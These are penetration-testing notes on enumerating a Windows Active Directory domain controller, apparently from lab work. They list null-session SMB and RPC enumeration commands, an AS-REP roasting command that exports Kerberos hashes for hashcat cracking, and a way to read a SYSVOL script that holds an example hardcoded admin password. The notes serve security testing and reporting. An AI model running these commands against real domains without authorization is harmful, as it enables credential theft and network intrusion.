Enum4linux
Pull a lot of information out of the Domain Controller using enum4linux
enum4linux 10.10.10.161
Password Policy enumeration
crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol
Put in the report that null authentication allows for domain enumeration
RPCClient
rpcclient -U '' 10.10.10.161
enumdomusers
queryusergroups [rid]
queryuser [rid]
querygroup [rid]
GetNPUsers
Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking
impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ -format hashcat
hashcat --example-hashes | grep -i krb
hashcat --example-hashes | less
Credentials inside SYSVOL
Credentials may be stored inside of a script in the SYSVOL of the domain controller. Can happen on old AD environments.
Anyone with domain credentials can access the SYSVOL. To assign default local admin credentials LAPS is now used instead of scripts via Group Policy
dir \\conda.local\SYSVOL\conda.local
Example path: \\conda.local\SYSVOL\conda.local\Policies{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
C:\Windows\system32>type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
$computer=$env:computername
$user = "Administrator"
$Password = "DefaultAdminPass1!"
$user = [adsi]"WinNT://$computer/$user,user"
$user.SetPassword($Password)
net user administrator /active:yes
SMB and RPC Null Authentication
smbclient -L \\\\10.10.10.100\\ -U '' -N
rpcclient -U '' -N 10.10.10.169
Notes
If the SID of a group is more than 500 or above 1000 then it is not a default Windows group and was created
